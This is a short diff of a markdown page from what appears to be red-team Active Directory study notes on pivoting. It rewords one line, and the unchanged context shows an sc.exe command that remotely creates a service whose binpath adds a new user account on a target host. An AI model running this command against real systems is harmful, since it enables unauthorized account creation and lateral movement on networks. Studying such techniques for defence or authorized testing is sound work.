tymyrddin/red-ad/source/docs/pivot/spawning.md

 |:--:|
 | Try communicating using an SMB named pipe |

-Register the dummy service (binpath is the command to run on the host)
+Register the fake service (`binpath` is the command to run on the host)

     sc.exe \\<IP Target> create <fakeservice> binpath= "net user <username> <password> /add" start= auto